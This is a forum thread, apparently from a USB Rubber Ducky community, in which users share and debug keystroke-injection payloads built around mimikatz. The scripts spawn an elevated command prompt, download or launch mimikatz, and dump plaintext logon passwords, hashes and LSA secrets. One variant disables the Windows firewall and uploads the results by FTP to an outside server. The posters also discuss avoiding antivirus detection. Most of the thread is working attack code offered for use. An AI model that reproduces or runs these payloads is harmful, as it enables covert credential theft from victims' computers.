[payload] Ducky script using mimikatz to dump passwords from memory
Hello all,

This is a Ducky script I knocked up to use the wonderful mimikatz tool. This tool allows you to dump hashes, including the clear-text WDigest passwords, from memory.

http://blog.gentilkiwi.com/securite/mimikatz/minidump

http://www.room362.com/blog/2013/6/7/using-mimikatz-alpha-or-getting-clear-text-passwords-with-a.html

Requirements:

- A webserver to host the mimikatz binary for your architecture (I tested this on Windows 7 Home Premium 64-bit). You need the ones in the 'alpha' subfolder of the zip/7z file for your architecture.

- The local user needs to be an administrator account / have admin privs.

What does it do?

1. It spawns a command shell with administrator privileges.

2. It downloads mimikatz from a webserver using PowerShell.

3. It uses mimikatz to dump WDigest passwords from memory.

4. It cleans up by deleting the binary it downloaded.

It could be improved by using sneaky data exfil techniques to transfer the data encrypted offsite, e.g. socat, ncat SSL, stunnel etc. If you have a firmware installed that lets you store files, you could copy the output to the SD card. Also, the mimikatz file could be encoded and run through PowerShell to generate the executable instead of 'wget'ing the file.

You may need to adjust timings in this script to play nice on your machine(s).

Script:

REM mimikatz ducky script to dump local wdigest passwords from memory using mimikatz (local user needs to be an administrator/have admin privs)
DELAY 3000
CONTROL ESCAPE
DELAY 1000
STRING cmd
DELAY 1000
CTRL-SHIFT ENTER
DELAY 1000
ALT y
DELAY 300
ENTER
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://<replace me with webserver ip/host>/mimikatz.exe','%TEMP%\mimikatz.exe')
DELAY 300
ENTER
DELAY 3000
STRING %TEMP%\mimikatz.exe
DELAY 300
ENTER
DELAY 3000
STRING privilege::debug
DELAY 300
ENTER
DELAY 1000
STRING sekurlsa::logonPasswords full
DELAY 300
ENTER
DELAY 1000
STRING exit
DELAY 300
ENTER
DELAY 100
STRING del %TEMP%\mimikatz.exe
DELAY 300
ENTER

Thanks for reading :)

Aaron

Edited by redmeatuk

AFAIK it dumps passwords for the currently logged in user. Mimikatz only works with Windows.

Update - I see that you do not require SYSTEM privileges to get this to work, just need to launch cmd.exe with administrator privileges and then run mimikatz commands. I've amended the script.

Edited by redmeatuk

WOW! mimikatz is amazing! I'm surprised this isn't more widely known. Everyone is so busy worrying about cracking Windows hashes and whatnot when they could just be doing this instead. mimikatz is like Reaver compared to trying to brute force WPA keys. It just spits it out in plaintext!

I've been reading a tutorial about how you can just use the Sysinternals tool procdump.exe to generate the .dmp file like this:

procdump.exe -accepteula -ma lsass.exe %COMPUTERNAME%_lsass.dmp

The beauty here is that procdump will not get flagged by AV like mimikatz already is (6/xx on VirusTotal already) because it's an official Microsoft utility! All we need is to have the Ducky run procdump and put the file on the Duck, and then we can run mimikatz on it later on our own PC. How come everyone always wants the Duck to grab things from the internet? We have the capability to save files on the Ducky, so why not use that instead?

I'm going to try and come up with a payload that simply saves a procdump file to the Ducky and I'll post it here.


Sounds promising, looking forward to seeing it in action.


Woo! Finally posting my own working payload! Thanks to overwraith and redmeatuk for their base code that I just tied together. This basically does exactly what redmeatuk's code does, except you won't need an internet connection.

Requirements:

1) Twin Duck firmware, or whatever it's called, that lets you have USB storage as well as firing inject.bin upon insertion.

2) mimikatz.exe (either 32-bit or 64-bit depending on the target environment) placed at the root of that DUCKY drive (the drive name MUST be "DUCKY"). Get it here: http://blog.gentilkiwi.com/mimikatz and use the exe from the "alpha" subdirectory.

Notes: I tried to do it with procdump, but it takes a LONG time to write out the 36 MB output file to the card, and the procdump window basically freezes and you have to forcibly kill it. You could probably write the .dmp file to a local disk and then copy it to the Ducky, but it's still going to take a while. I don't think that many AV programs are looking for mimikatz, so it's fairly safe.

This script could be optimized a little; it's a bit slow and it leaves two windows open. You want to leave the mimikatz window open though, because after this f$#%^$ker executes you'll be staring at plaintext passwords for the logged-on users!

REM Author: shutin who just tied two other authors together:
REM overwraith for the exe running stuff and redmeatuk who brought mimikatz to the party
REM Name: Runmimikatz.txt
DEFAULT_DELAY 75
DELAY 3000
REM get a cmd prompt this way because it's admin and we need that for mimikatz
CONTROL ESCAPE
DELAY 1000
STRING cmd
DELAY 1000
REM the admin part booyah
CTRL-SHIFT ENTER
DELAY 1000
ALT y
DELAY 300
ENTER

REM Change directories because System32 appears to be protected.
STRING CD %TEMP%
ENTER

REM Make batch file that waits for SD card to mount.
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat contents (typed into copy con, so batch-file rules apply: %%d in the for loop)
STRING :while1
ENTER
STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d
ENTER
REM Quote the path and test for the exe itself: while the card is not mounted %myd% is empty,
REM and an unquoted "if exist (" is a syntax error that aborts the batch instead of looping
STRING if exist "%myd%\mimikatz.exe" (
ENTER
STRING goto break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto while1
ENTER
STRING :break
ENTER
REM
REM FINALLY ACTUALLY RUN AN EXE
STRING START %myd%\mimikatz.exe
ENTER
REM Ctrl-Z ends copy con and writes the batch file, then run it
CONTROL z
ENTER
STRING DuckyWait.bat
ENTER
DELAY 1000
ENTER
DELAY 3000
STRING privilege::debug
DELAY 300
ENTER
DELAY 1000
STRING sekurlsa::logonPasswords full
DELAY 300
ENTER

There was certainly room for improvement, nice work shutin ;)

Thanks! mimikatz is a weird tool. Is there any way to get it to spit its output into a text file? It's mostly in French, so it's a bit hard to understand. There is also no "help". I really want to get my version to dump the output back to the Ducky drive instead of just displaying the console window.

Looks like mimikatz will even work with 'encrypted' Windows 8/8.1 passwords - https://twitter.com/gentilkiwi/status/351438778231033856/photo/1

This tool rocks!

But will it work if the password is one of those cloud passwords? I had trouble trying to extract those, because I think they are stored online.


I've not seen any switches or examples of how to get mimikatz to output to a file; there may be an equivalent of script/tee on Windows. This works, but you will not see any output, as standard error and standard output will be redirected to a text file of your choosing, e.g.:

mimikatz.exe > output.txt 2>&1

Then just issue your commands as normal and exit.

Cloud passwords? Not sure; give it time though, I'm sure someone will figure it all out :)

Edited by redmeatuk


Hello, for those of you that want a text file output on Windows and FTP upload:

DELAY 3000
CONTROL ESCAPE
DELAY 1000
STRING cmd
DELAY 2000
CTRL-SHIFT ENTER
DELAY 2000
REM accept the UAC prompt (drop this if UAC is disabled on the target)
ALT y
DELAY 500
STRING netsh firewall set opmode disable
DELAY 500
ENTER
DELAY 500
REM DownloadFile takes two quoted arguments: the source URL and the destination path
STRING powershell (new-object System.Net.WebClient).DownloadFile('https://<your server>/mimikatz.exe','%TEMP%\mimikatz.exe')
ENTER
DELAY 4000
STRING cd %temp%
DELAY 300
ENTER
DELAY 500
REM stdout goes to pwlog.txt while mimikatz runs; type shows it once mimikatz exits
STRING mimikatz.exe > pwlog.txt & type pwlog.txt
DELAY 300
ENTER
DELAY 1000
STRING privilege::debug
DELAY 300
ENTER
STRING sekurlsa::logonPasswords full
DELAY 300
ENTER
DELAY 500
STRING exit
DELAY 300
ENTER
DELAY 100
STRING del %TEMP%\mimikatz.exe
DELAY 300
ENTER
STRING move pwlog.txt c:\
ENTER
DELAY 300
STRING ftp yoursite.com
ENTER
DELAY 1000
STRING youruser
ENTER
DELAY 1000
STRING yourpass
ENTER
DELAY 1000
STRING lcd c:\
ENTER
DELAY 800
STRING put pwlog.txt
ENTER
DELAY 500
STRING quit
ENTER
DELAY 300
STRING del c:\pwlog.txt
ENTER
Edited by DyFukA

Fantastic contribution. Here's a version I whipped up that uses c_duck_v2.1 firmware (Twin Duck) to execute mimikatz from the DUCKY SD card and save the password log file to disk.

REM Author: Hak5Darren based on code from redmeatuk, shutin, DyFukA
REM Description: Dump local wdigest passwords from memory using mimikatz
REM Note: Uses c_duck_v2.1 firmware (Twin Duck) to execute mimikatz from
REM SD card labeled "DUCKY" and save log file as %computername%-passwords.txt
REM Target: Windows 7 x64 (target win32 with 32-bit binary)

REM *** UAC Bypass ***
DELAY 2000
WINDOWS r
DELAY 200
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY 2000
ALT y
DELAY 500

REM *** Define DUCKY drive as %duck%
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d
ENTER
DELAY 500

REM *** Execute mimikatz from SD card and save log file to disk ***
STRING %duck%\mimikatz_alpha_x64.exe > %duck%\%computername%-passwords.txt
ENTER
DELAY 100
STRING privilege::debug
ENTER
STRING sekurlsa::logonPasswords full
ENTER

REM *** GTFO ***
STRING exit
ENTER
STRING exit
ENTER


Here's an updated version using a recommendation from Mubix that should speed it up ever so slightly.

REM Author: Hak5Darren. Props: shutin, DyFukA, Mubix
REM Description: Dump local wdigest passwords from memory using mimikatz
REM Note: Uses c_duck_v2.1 firmware (Twin Duck) to execute mimikatz from
REM SD card labeled "DUCKY" and save log file as %computername%-passwords.txt
REM Target: Windows 7 x64 (target win32 with 32-bit binary)

REM *** UAC Bypass ***
DELAY 2000
WINDOWS r
DELAY 200
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY 2000
ALT y
DELAY 500

REM *** Define DUCKY drive as %duck%
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d
ENTER
DELAY 500

REM *** Execute mimikatz from SD card and save log file to disk ***
STRING %duck%\mimikatz_alpha_x64.exe "privilege::debug" "sekurlsa::logonPasswords full" "samdump::hashes" exit > %duck%\%computername%-passwords.txt
ENTER

REM *** GTFO ***
STRING exit
ENTER
STRING exit
ENTER

A comment from YouTube on the latest episode featuring the payload suggests OS/CPU detection.

sendforththegunboats

You could improve this further by detecting the OS architecture using the %processor_architecture% variable, then running the specific command based on the output.

The same could be done with ver to figure out if it's NT5 or NT6 and run the appropriate version of mimikatz. Any takers?



So, noob question here. I can't seem to get mimikatz to run after insertion. I have copied Darren's code from above, but for some reason it exits prior to executing the .exe file. I modified it a bit; maybe someone can look at this.

REM Author: Hak5Darren. Props: shutin, DyFukA, Mubix
REM Description: Dump local wdigest passwords from memory using mimikatz
REM Note: Uses c_duck_v2.1 firmware (Twin Duck) to execute mimikatz from
REM SD card labeled "DUCKY" and save log file as %computername%-passwords.txt
REM Target: Windows 7 x86 
REM *** UAC Bypass ***
DELAY 2000
WINDOWS r
DELAY 200
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY 2000
ALT y
DELAY 500
REM *** Define DUCKY drive as %duck%
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d
ENTER
DELAY 1000
REM *** Execute mimikatz from SD card and save log file to disk ***
STRING %duck%\mimikatz.exe "privilege::debug" "sekurlsa::logonPasswords full" "samdump::hashes" exit > %duck%\%computername%-passwords.txt
ENTER
REM *** GTFO ***
STRING exit
ENTER
STRING exit
ENTER

I changed the %duck%\mimikatz_alpha_x64.exe to just be mimikatz.exe.

That should work, right? I copied alpha/win32/mimikatz.exe over, but it still doesn't seem to run. It seems to simply skip over this and exit. Any ideas?

Edited by mypyramorhinx

No one wants to help me out here? I can't seem to get this to work. The other problem that I have, well, part of this problem, is that the mimikatz application is not named as it is listed here in the Ducky code. It is simply named mimikatz.exe. I know to take the program from the right folder, but I seem to be at a standstill. Anyone out there that can help with this payload?


Darren's updated version above gives me the following error:

mimikatz(commandline) # privilege::debug"sekurlsa::logonPasswordssamdump::hashes

ERROR mimikatz_doLocal ; "debug"sekurlsa::logonPasswordssamdump::hashes" command of "privilege" module not found !

Module : privilege

Full name : Privilege module

debug - Ask debug privilege

LOOK AT: ::logonPasswordssamdump

I have missing spaces in my command line.

This line: STRING %duck%\mimikatz.exe "privilege::debug" "sekurlsa::logonPasswords full" "samdump::hashes" exit > %duck%\%computername%-passwords.txt

doesn't create spaces in the command line between debug" "sekurlsa and full" "samdump.

PLEASE HELP. Seems simple?!


If you cd %duck% first, you can use:

  • mimikatz privilege::debug log sekurlsa::logonpasswords token::elevate lsadump::sam lsadump::secrets exit
  • mimikatz privilege::debug "log filename.log" sekurlsa::logonpasswords token::elevate lsadump::sam lsadump::secrets exit
  • mimikatz privilege::debug sekurlsa::logonpasswords token::elevate lsadump::sam lsadump::secrets exit > filename.log

Hi everybody :lol:

After the gift from Darren @ Defcon, I have now made my own key ;) - I use cm_duck.hex

Enjoy my script, and let me know if any improvement is needed (be nice, it's my first one :tongue:)

DELAY 2000
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb RunAs
ENTER
DELAY 1500
ALT o
DELAY 250
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "MIMIKEY"') do set MIMIKEY=%d
ENTER
DELAY 500
STRING cd /d %MIMIKEY%\
ENTER
DELAY 500
STRING mimikatz_%PROCESSOR_ARCHITECTURE% "log %computername%.log" version privilege::debug sekurlsa::logonpasswords sekurlsa::ekeys vault::cred vault::list token::elevate lsadump::sam lsadump::secrets vault::cred vault::list answer exit
ENTER
DELAY 500
STRING exit
ENTER

You only need at the root of the key:

  • mimikatz_x86.exe
  • mimikatz_amd64.exe

mimikatz will create a %computername%.log at the root of the key ;) It's faster than redirection.


Hello,

Thank you for your script.

But I have an issue (I am a newbie..).

In your script you are writing "ALT o",

but I don't know what it means, and it doesn't do anything on my computer.

(France/Belgium)

So when the script is processing, it just writes "o" on the terminal.

Can you help me?

Thanks!

C:\Users\XXX>ofor /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set DUCKY=%d
'ofor' is not recognized as an internal or external command,
operable program or batch file.

'ALT o' is to bypass UAC in French ;), replace it with 'y' for English

If no UAC, you can remove it ;)

Ooh, right, I had forgotten you are French. :)

But it's not working on my PC (French too), so it just writes "o" on the cmd, so the next command line is broken:

for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set DUCKY=%d
becomes
ofor /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set DUCKY=%d

Do you mean ALT GR "o"?
